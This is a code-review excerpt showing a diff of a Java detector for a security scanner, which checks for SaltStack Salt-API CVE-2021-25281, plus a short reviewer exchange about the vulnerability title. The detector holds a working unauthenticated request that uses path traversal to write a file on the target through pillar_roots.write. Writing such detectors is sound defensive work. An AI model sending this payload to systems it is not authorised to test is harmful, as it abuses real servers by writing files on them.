community/detectors/saltstack_cve_2021_25281/src/main/java/com/google/tsunami/plugins/detectors/saltstack/cve202125281/SaltStackCVE202125281VulnDetector.java

```diff
@@ -0,0 +1,143 @@
+                .filter(NetworkServiceUtils::isWebService)
+                .filter(this::isServiceVulnerable)
+                .map(networkService -> buildDetectionReport(targetInfo, networkService))
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + "run";
+    HttpHeaders httpHeaders = HttpHeaders.builder()
+        .addHeader(com.google.common.net.HttpHeaders.CONTENT_TYPE, MediaType.JSON_UTF_8.toString())
+        .build();
+    ByteString httpBody = ByteString.copyFromUtf8(
+        "{\"eauth\": \"auto\", \"client\": \"wheel_async\", "
+            + "\"fun\": \"pillar_roots.write\", \"data\": \"test\", \"path\": "
+            + "\"../../../../../../../../../../../../../../../../../../tmp/success\"}");
+    try {
+      HttpResponse response = httpClient.send(
+          post(targetUri).withEmptyHeaders().setHeaders(httpHeaders).setRequestBody(httpBody)
+              .build());
+      Optional<JsonElement> body = response.bodyJson();
+      if (response.status() == HttpStatus.OK && body.isPresent()) {
+        JsonElement jsonElement = body.get();
+        if (!jsonElement.isJsonObject()) {
+          return false;
+        }
+        if (!jsonElement.getAsJsonObject().has("return") ||
+            !jsonElement.getAsJsonObject().get("return").isJsonArray()) {
+          return false;
+        }
+        JsonArray returnArray = jsonElement.getAsJsonObject().get("return").getAsJsonArray();
+        if (returnArray.size() == 0 || !returnArray.get(0).isJsonObject()) {
+          return false;
+        }
+        JsonObject returnObject = returnArray.get(0).getAsJsonObject();
+        if (returnObject.has("tag") && returnObject.has("jid")) {
+          return true;
+        }
+      }
+    } catch (IOException e) {
+      logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri);
+    } catch (JsonSyntaxException e) {
+      logger.atWarning().withCause(e).log("Unable to parse response body '%s'.", targetUri);
+    }
+    return false;
+  }
+
+  private DetectionReport buildDetectionReport(
+      TargetInfo targetInfo, NetworkService vulnerableNetworkService) {
+    return DetectionReport.newBuilder()
+        .setTargetInfo(targetInfo)
+        .setNetworkService(vulnerableNetworkService)
+        .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli()))
+        .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED)
+        .setVulnerability(
+            Vulnerability.newBuilder()
+                .setMainId(
+                    VulnerabilityId.newBuilder().setPublisher("TSUNAMI_COMMUNITY")
+                        .setValue("CVE_2021_25281"))
+                .setSeverity(Severity.HIGH)
+                .setTitle(
+                    "SaltStack Salt-API Unauthenticated Remote Command Execution vulnerability")
```

Comment:
Nitpick: add the CVE number to this title as the current one seems to be too generic.

Reply:
done